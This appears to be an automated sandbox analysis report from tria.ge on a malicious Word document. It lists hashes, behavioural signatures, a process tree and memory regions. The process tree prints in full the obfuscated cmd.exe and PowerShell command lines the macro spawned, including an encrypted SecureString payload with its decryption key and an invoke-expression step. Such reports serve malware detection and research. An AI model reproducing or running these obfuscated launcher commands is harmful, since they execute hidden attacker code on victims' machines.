Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    137s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/05/2024, 04:00

General

  • Target

    38256f1877e291236a7c01ecceec7786_JaffaCakes118.doc

  • Size

    145KB

  • MD5

    38256f1877e291236a7c01ecceec7786

  • SHA1

    024e3fcdcacb942f9bb01311c4383fdb022d89d9

  • SHA256

    fd79de4082ddd5855e8589bf379265cd31c83375bcce845eeae720d1f126f210

  • SHA512

    058093c6265f931c2e862462ccb2cb519074174be5fadf9736b84e478e55b3a350a8e6b717ef24f3ea1e00aaa2fa7891487e5b070f806d558fe555fca3543f80

  • SSDEEP

    1536:QqfejieBS2ac0W+ah3a0DSia8OhVhZBkhJHMLLgklDVV+d0Lu2EUkGpWoZ8Rn95R:Qjiev3DTalfrBtHQd+pWEoy5qoiWZKVD

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\38256f1877e291236a7c01ecceec7786_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd pvCrTdftvMXdwS nXauNEvMhBUwkrKpJz tKGfOBQt & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %pnLPHuLiQjsHsCO%=wqiJAjOYRN&&set %YjowfUzQ%=p&&set %EXLoFEuzA%=o^w&&set %UoToljwEjCmERRw%=AuYZQCrJ&&set %FkkJrzwFYqwf%=!%YjowfUzQ%!&&set %HwNWTGZmzuaXKbu%=LoTMnuZM&&set %KVMEBNR%=e^r&&set %tIkipzTBWS%=!%EXLoFEuzA%!&&set %vzIVSbE%=s&&set %KqiUArzRwJhnSZl%=dzGXrazZzMO&&set %MvAviUXhjIEhZG%=he&&set %pTvIpLbmjNQESH%=ll&&!%FkkJrzwFYqwf%!!%tIkipzTBWS%!!%KVMEBNR%!!%vzIVSbE%!!%MvAviUXhjIEhZG%!!%pTvIpLbmjNQESH%! " ( [rUNtiMe.InteROPsERViCeS.MARShAL]::PTRTOStRinGBstR( [rUntiMe.InTeRopSErViCes.MaRShal]::seCuresTringToBsTr( $('76492d1116743f0423413b16050a5345MgB8AEgAegA5AEUAbwBRAEgAaABFAFQAaQBaAFgATQBMAFgATQBrADkAVwBxAGcAPQA9AHwAMgA4AGIAYgBlADUAYgBiAGIAZAA5ADUANQBmADkAMwBhADUAMgA4ADEAMAAyADkAZgBkADYAMwA1AGIANABkAGIAYQA3ADUAYQBiAGIANQAyADUAYgBlAGYAMwBhAGIANgBiAGMAOQA0AGYAMwA3ADcAZgBjAGEANAAzAGMANQBiADAAMgBkAGQAOQAzAGIAMwAwAGIAZABmADUANwBhADUAYwA4ADUAOAA3AGIAZgA1ADUAYwA3ADEAYwAyADgAMQA0ADIAYgBmADEAYwA4AGMAZABlAGYAZgBkADQAZQA1ADYAMAA1ADcAMAA0ADMANABhAGIAMAA1AGIAYwA0ADAAYQBkAGMAYQAyADEAZAA1ADkAMgA3ADMAMAA5AGYAYwBlAGIAMABlADgAMABlAGEAMwA4AGIANABhAGYAYQAxADEAYQAxAGIAZQBmADIAOAAzADIAYQA2ADIAOQA5AGIAYQA5ADcAMwBhADEANwBhAGEAMQBmADAAMgA2AGEAOQBhAGYAMAAyAGEAZAAyADAANQBkAGUAOQBmADQANQBhADEAZQAzADUAZgA2ADcAOQA1AGEAMwBkAGYAYwBjADkANABkADAANgBlADkAYwAwADMANgBkADEANQA3AGIAZQAwAGEAMQA5AGIAYgA5AGYAZAA5ADUAMwAwADUAMQBhADMANgBjADEAMwA3AGUAZABkADQAZABjAGMAZQA2AGUANgBjAGMAMgA3ADcAYQAzADQAMgAzADgAZAA0ADgAYQA3ADkAZgAxADIAZgA3ADYAZgA4ADQANABjADgAMwA5AGIAMgBmADEAZABkAGIANAA2ADIAYQA4ADMAZgAzADEANQA1ADUAYQA0ADIAMAAyADUAYwBjADUAYwBkADkAYgAyADkAYwA0AGQAZQA3ADAAMQBmAGMAMABjAGEAOQBmADMANwAxAGYAYwAzADkAMQA0AGQAYwAzADEAMAAxADUAMwAxADYAOQAwAGEANABiADEANQBiADYAMwA3ADgAZAAzAGIANQBmADYAZQA5AGUAOQBiADIAZABiADMANgA2AGEAMABjADgAOQA5ADIANwAzADUAZAA4AGEANgAyADgAMwBlADEANQA0AGMAMABjAGIAMABlAGYAYQBjAGEANQA5ADcAMwAwAGEAYwAxADEANwA0AGIAMAAxADEAMwAxADMAOABkAGUAMgA0AGYAYgAxADAAYwA4ADIAYgBlAGEAZAA5AGYAZQA0ADYANgA0ADEAOQBlADgAMwBiAGEAOAA0AGEAMwBhAGEANAAyADcAMQAyADQANQA0AGUAMQAxADAAYgAzAGIAMQAzADIAYgBkAGYAMgA3AGUAYgA3ADIAYgBiADEAYwBiADMAZQBkADAAOAA1ADMAYwBiADAAMwA0ADUANwBkADEAOQA4ADYAZQA3AGMAMABhADYAMwBjADcAYQA5ADAAZQA2ADAANABjADQAMQAzADgAYwA2AGUAYQA5AGMANgA0ADkAYQBmADYAZgAwADgANQBlAGIAZAA1AGYAOQA3AGMAMwA1AGYAMwBjAGUAZABiAGUANgA3ADMANwBmADIANAA2AGYAMQAwADMAZAAzADAAMAA4ADUAYwA1AGEAZgBlADcAYwA3AGMAZQA4ADMAZAAwAGYAYgA3ADMAYgBlADgAYwBmADkAZQA0AGQAOQAzADUAZAA2ADIAOAAxAGMAYgAzADMAZgAwADIANgBhAGMAYQBhADkAOQA2AGMANwAzAGEAYgBjADUANQAyAGMAMgA5ADYAMQA4ADQAYQBkADcAMwBkADYANAAwADgAZAA4ADEAMQBhADcAOAA4ADUAMgAxADkAMgA1ADUANAA4ADEAZAA0ADIAZgAwADYAZABkADQAZgAwAGEAOQAyADUAZABhADMANwAyADEAZABkADgAYgA2ADYAMQAxADUAYgBlADMAMQA3AGYANwAwADIANwAyADQAOAAzAGUANgA0AGIAYwA1ADEAMgBhAGQANwA5AGIAZQAxAGIAOAA1AGQAMAA3AGEAMwA4AGQAMABhAGEANQA0AGEAMgAxADYAMgBlAGQAYgA5AGYAOQA3AGYAZQBiAGUAZQA0ADIANABkADUAMgBmADkAYwBjADQANQBiAGEAYQBlADMAYwA5ADcAMAAxADUAMAA0AGEAZgA5ADUAZgBmADgAYQBiADQANwBhADYAMgAxAGUAZQA2AGMAMABkADEAZgBlAGUAZgA0ADYAZABkAGIANQA3AGEANgAwAGIAMQA1ADgAZQBkADEANgA2AGEAOQAxADIANABkADMAZgBlAGMAMAA5ADkANQBiADYANwAyAGYAYwAzAGMAMQBlADcAYgAyADIANQBkADQAZABiADgAZQBhADIANABhADcAMwBmADkAMABiAGMAMQA0ADgANgA1ADEAYwA4ADAANgAxAGIANAAwADAAZgA5ADQAOQBhAGMANQAzAGIAMgBmADUAYQBkADIAYwA4ADUAZQAxADUAZQA1ADIAMQA1AGEAMgAzAGEANwAzADkAYwA5AGUAZQA4AGUAYwAwAGIAOAAyAGQAOQBjAGQANwBiAGUAOQA4ADAAMwA0AGIANwBlAGQAOAA4ADQANQBhAGEAOQAyADcAYgA3AGQANgAzADkAOQBmADMANwA5ADIAYwBmAGUAZgA5AGMAZAA1ADIAYgA5ADUANgAwADgAZgBmAGYANAAwAGIANQAyAGUAOAAyADgAOAA1ADYAYgAxAGUAMgA3ADMANABhAGEANgA2ADUAMwBjADUANQAzADEAYwA0ADQAOAA5ADkAOQAwADYAZQA1ADYAMwA1AGMAZgAyADkANQA5ADkANgA1ADgANwA1ADYANwA0ADEAMgBlADgAZAA4ADEAOAA2ADAAYwA3AGIAYwA3ADcAZgA3AGYAOAAwAGIAMgA2ADUANwBiADcANQA4ADQAMQAzAGEAOQA2AGQAYwBjAGEAZABkADcAYgAzAGQAMgBkAGUANQAxAGYAZgBjAGEAMAA0ADEANQA0ADAAMABkAGMAOQBiAGYAYQAyAGIANgA3ADEAMQBmADkAZgA3AGUAYgA4ADUAYQA0ADgAMAA3ADMAYQBiADAAZABjADAAYQBiAGYAOABhADEANQAxAGUAZQBiAGYAYwBlADgAZgA3AGQAMgAwAGYAZgA5ADQAZAA3ADEANABiADcANAAwAGIAZAA0ADEAMgBhADQAYQBkAGMANAAxADEAZQA3AGUANAA5ADcAOABlADcAOAA0AGUAMQBlADIAOQAxADYAZgA5ADcAZABhADcAOQA4AGUANQBiAGMANwA0ADcAZQA2ADgANAA3ADcANwBiADgAYQBmADcANAA5ADMAZQBlADMAMABjADMANQA5ADIANgA1AGMAYQBjAGYANgBlAGUANQA2ADQAYQBmAGYAMQBmADYAMAAxADQAMQAzAGYAOQA5AGIAMABhADYAOQA1ADEAZgBkAGEAMQBjADMAMwAwADUAMAA2ADgAMwAyADUAMQBhADYANwBkADcAZAA0ADAAYQBhADUAMQBmADEAOABlADQAOQBhADYAMgAxADgAZAA0ADQAMgBmAGQAYQAxAGUAOAAxADEAYgBhADcANABkADIAZQAxAGIAMAA3AGUANAA0ADgAZgA5ADEAOQA5ADUAZABmAGQAMQA5AGMANAAwAGMAMQA0ADYAYQA5AGMAZQA2AGUANABiADkAMgAyADkAYwAyADgAYQAyAGUAMgAyAGUANgBkADUAYgA2ADEAMQBjAGEANAA5AGIANgBhADUAZQBmADAAOABmADcAMgA4ADAAOAAwAGIAZgBlADcAMwAzAGEAMQAzAGYAMwBmAGEAZQBhADYAMAA3AGUAOABjAGYAMwA0ADMAYQAyADkAYQA1AGYAYgBhADcAOQAwAGUANQBjADYAYQBlADIAYwA1ADcANQA4ADQAOAA5ADcAMgAyAGEAZQA0AGEAYwA4ADcAOQAwAGYAMQBiADQAOABjADgANABhADcAZQAxADEAZQAxAGYAZAAzADYAZAA1AGEAMAA2AGIAMAA2AGMANwAyAGIA'|.('conVEr'+'Tto-sECUR'+'es'+'TR'+'i'+'ng') -ke (129..114)) )) )| . ( $SHelLiD[1]+$SHELLiD[13]+'x')
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:5068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell " ( [rUNtiMe.InteROPsERViCeS.MARShAL]::PTRTOStRinGBstR( [rUntiMe.InTeRopSErViCes.MaRShal]::seCuresTringToBsTr( $('76492d1116743f0423413b16050a5345MgB8AEgAegA5AEUAbwBRAEgAaABFAFQAaQBaAFgATQBMAFgATQBrADkAVwBxAGcAPQA9AHwAMgA4AGIAYgBlADUAYgBiAGIAZAA5ADUANQBmADkAMwBhADUAMgA4ADEAMAAyADkAZgBkADYAMwA1AGIANABkAGIAYQA3ADUAYQBiAGIANQAyADUAYgBlAGYAMwBhAGIANgBiAGMAOQA0AGYAMwA3ADcAZgBjAGEANAAzAGMANQBiADAAMgBkAGQAOQAzAGIAMwAwAGIAZABmADUANwBhADUAYwA4ADUAOAA3AGIAZgA1ADUAYwA3ADEAYwAyADgAMQA0ADIAYgBmADEAYwA4AGMAZABlAGYAZgBkADQAZQA1ADYAMAA1ADcAMAA0ADMANABhAGIAMAA1AGIAYwA0ADAAYQBkAGMAYQAyADEAZAA1ADkAMgA3ADMAMAA5AGYAYwBlAGIAMABlADgAMABlAGEAMwA4AGIANABhAGYAYQAxADEAYQAxAGIAZQBmADIAOAAzADIAYQA2ADIAOQA5AGIAYQA5ADcAMwBhADEANwBhAGEAMQBmADAAMgA2AGEAOQBhAGYAMAAyAGEAZAAyADAANQBkAGUAOQBmADQANQBhADEAZQAzADUAZgA2ADcAOQA1AGEAMwBkAGYAYwBjADkANABkADAANgBlADkAYwAwADMANgBkADEANQA3AGIAZQAwAGEAMQA5AGIAYgA5AGYAZAA5ADUAMwAwADUAMQBhADMANgBjADEAMwA3AGUAZABkADQAZABjAGMAZQA2AGUANgBjAGMAMgA3ADcAYQAzADQAMgAzADgAZAA0ADgAYQA3ADkAZgAxADIAZgA3ADYAZgA4ADQANABjADgAMwA5AGIAMgBmADEAZABkAGIANAA2ADIAYQA4ADMAZgAzADEANQA1ADUAYQA0ADIAMAAyADUAYwBjADUAYwBkADkAYgAyADkAYwA0AGQAZQA3ADAAMQBmAGMAMABjAGEAOQBmADMANwAxAGYAYwAzADkAMQA0AGQAYwAzADEAMAAxADUAMwAxADYAOQAwAGEANABiADEANQBiADYAMwA3ADgAZAAzAGIANQBmADYAZQA5AGUAOQBiADIAZABiADMANgA2AGEAMABjADgAOQA5ADIANwAzADUAZAA4AGEANgAyADgAMwBlADEANQA0AGMAMABjAGIAMABlAGYAYQBjAGEANQA5ADcAMwAwAGEAYwAxADEANwA0AGIAMAAxADEAMwAxADMAOABkAGUAMgA0AGYAYgAxADAAYwA4ADIAYgBlAGEAZAA5AGYAZQA0ADYANgA0ADEAOQBlADgAMwBiAGEAOAA0AGEAMwBhAGEANAAyADcAMQAyADQANQA0AGUAMQAxADAAYgAzAGIAMQAzADIAYgBkAGYAMgA3AGUAYgA3ADIAYgBiADEAYwBiADMAZQBkADAAOAA1ADMAYwBiADAAMwA0ADUANwBkADEAOQA4ADYAZQA3AGMAMABhADYAMwBjADcAYQA5ADAAZQA2ADAANABjADQAMQAzADgAYwA2AGUAYQA5AGMANgA0ADkAYQBmADYAZgAwADgANQBlAGIAZAA1AGYAOQA3AGMAMwA1AGYAMwBjAGUAZABiAGUANgA3ADMANwBmADIANAA2AGYAMQAwADMAZAAzADAAMAA4ADUAYwA1AGEAZgBlADcAYwA3AGMAZQA4ADMAZAAwAGYAYgA3ADMAYgBlADgAYwBmADkAZQA0AGQAOQAzADUAZAA2ADIAOAAxAGMAYgAzADMAZgAwADIANgBhAGMAYQBhADkAOQA2AGMANwAzAGEAYgBjADUANQAyAGMAMgA5ADYAMQA4ADQAYQBkADcAMwBkADYANAAwADgAZAA4ADEAMQBhADcAOAA4ADUAMgAxADkAMgA1ADUANAA4ADEAZAA0ADIAZgAwADYAZABkADQAZgAwAGEAOQAyADUAZABhADMANwAyADEAZABkADgAYgA2ADYAMQAxADUAYgBlADMAMQA3AGYANwAwADIANwAyADQAOAAzAGUANgA0AGIAYwA1ADEAMgBhAGQANwA5AGIAZQAxAGIAOAA1AGQAMAA3AGEAMwA4AGQAMABhAGEANQA0AGEAMgAxADYAMgBlAGQAYgA5AGYAOQA3AGYAZQBiAGUAZQA0ADIANABkADUAMgBmADkAYwBjADQANQBiAGEAYQBlADMAYwA5ADcAMAAxADUAMAA0AGEAZgA5ADUAZgBmADgAYQBiADQANwBhADYAMgAxAGUAZQA2AGMAMABkADEAZgBlAGUAZgA0ADYAZABkAGIANQA3AGEANgAwAGIAMQA1ADgAZQBkADEANgA2AGEAOQAxADIANABkADMAZgBlAGMAMAA5ADkANQBiADYANwAyAGYAYwAzAGMAMQBlADcAYgAyADIANQBkADQAZABiADgAZQBhADIANABhADcAMwBmADkAMABiAGMAMQA0ADgANgA1ADEAYwA4ADAANgAxAGIANAAwADAAZgA5ADQAOQBhAGMANQAzAGIAMgBmADUAYQBkADIAYwA4ADUAZQAxADUAZQA1ADIAMQA1AGEAMgAzAGEANwAzADkAYwA5AGUAZQA4AGUAYwAwAGIAOAAyAGQAOQBjAGQANwBiAGUAOQA4ADAAMwA0AGIANwBlAGQAOAA4ADQANQBhAGEAOQAyADcAYgA3AGQANgAzADkAOQBmADMANwA5ADIAYwBmAGUAZgA5AGMAZAA1ADIAYgA5ADUANgAwADgAZgBmAGYANAAwAGIANQAyAGUAOAAyADgAOAA1ADYAYgAxAGUAMgA3ADMANABhAGEANgA2ADUAMwBjADUANQAzADEAYwA0ADQAOAA5ADkAOQAwADYAZQA1ADYAMwA1AGMAZgAyADkANQA5ADkANgA1ADgANwA1ADYANwA0ADEAMgBlADgAZAA4ADEAOAA2ADAAYwA3AGIAYwA3ADcAZgA3AGYAOAAwAGIAMgA2ADUANwBiADcANQA4ADQAMQAzAGEAOQA2AGQAYwBjAGEAZABkADcAYgAzAGQAMgBkAGUANQAxAGYAZgBjAGEAMAA0ADEANQA0ADAAMABkAGMAOQBiAGYAYQAyAGIANgA3ADEAMQBmADkAZgA3AGUAYgA4ADUAYQA0ADgAMAA3ADMAYQBiADAAZABjADAAYQBiAGYAOABhADEANQAxAGUAZQBiAGYAYwBlADgAZgA3AGQAMgAwAGYAZgA5ADQAZAA3ADEANABiADcANAAwAGIAZAA0ADEAMgBhADQAYQBkAGMANAAxADEAZQA3AGUANAA5ADcAOABlADcAOAA0AGUAMQBlADIAOQAxADYAZgA5ADcAZABhADcAOQA4AGUANQBiAGMANwA0ADcAZQA2ADgANAA3ADcANwBiADgAYQBmADcANAA5ADMAZQBlADMAMABjADMANQA5ADIANgA1AGMAYQBjAGYANgBlAGUANQA2ADQAYQBmAGYAMQBmADYAMAAxADQAMQAzAGYAOQA5AGIAMABhADYAOQA1ADEAZgBkAGEAMQBjADMAMwAwADUAMAA2ADgAMwAyADUAMQBhADYANwBkADcAZAA0ADAAYQBhADUAMQBmADEAOABlADQAOQBhADYAMgAxADgAZAA0ADQAMgBmAGQAYQAxAGUAOAAxADEAYgBhADcANABkADIAZQAxAGIAMAA3AGUANAA0ADgAZgA5ADEAOQA5ADUAZABmAGQAMQA5AGMANAAwAGMAMQA0ADYAYQA5AGMAZQA2AGUANABiADkAMgAyADkAYwAyADgAYQAyAGUAMgAyAGUANgBkADUAYgA2ADEAMQBjAGEANAA5AGIANgBhADUAZQBmADAAOABmADcAMgA4ADAAOAAwAGIAZgBlADcAMwAzAGEAMQAzAGYAMwBmAGEAZQBhADYAMAA3AGUAOABjAGYAMwA0ADMAYQAyADkAYQA1AGYAYgBhADcAOQAwAGUANQBjADYAYQBlADIAYwA1ADcANQA4ADQAOAA5ADcAMgAyAGEAZQA0AGEAYwA4ADcAOQAwAGYAMQBiADQAOABjADgANABhADcAZQAxADEAZQAxAGYAZAAzADYAZAA1AGEAMAA2AGIAMAA2AGMANwAyAGIA'|.('conVEr'+'Tto-sECUR'+'es'+'TR'+'i'+'ng') -ke (129..114)) )) )| . ( $SHelLiD[1]+$SHELLiD[13]+'x')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4192

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD6F1B.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwxe0lxi.i31.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3600-33-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-30-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-6-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-5-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-3-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-7-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-8-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-9-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-10-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-11-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-12-0x00007FFC4C4A0000-0x00007FFC4C4B0000-memory.dmp

    Filesize

    64KB

  • memory/3600-13-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-14-0x00007FFC4C4A0000-0x00007FFC4C4B0000-memory.dmp

    Filesize

    64KB

  • memory/3600-15-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-18-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-19-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-17-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-16-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-0-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-38-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-4-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-39-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-37-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-40-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-41-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-1-0x00007FFC8E94D000-0x00007FFC8E94E000-memory.dmp

    Filesize

    4KB

  • memory/3600-576-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-63-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-66-0x00007FFC8E94D000-0x00007FFC8E94E000-memory.dmp

    Filesize

    4KB

  • memory/3600-67-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-106-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-2-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-540-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-550-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-551-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-552-0x00007FFC8E8B0000-0x00007FFC8EAA5000-memory.dmp

    Filesize

    2.0MB

  • memory/3600-572-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-573-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-574-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/3600-575-0x00007FFC4E930000-0x00007FFC4E940000-memory.dmp

    Filesize

    64KB

  • memory/4192-51-0x000001DF3DBE0000-0x000001DF3DC02000-memory.dmp

    Filesize

    136KB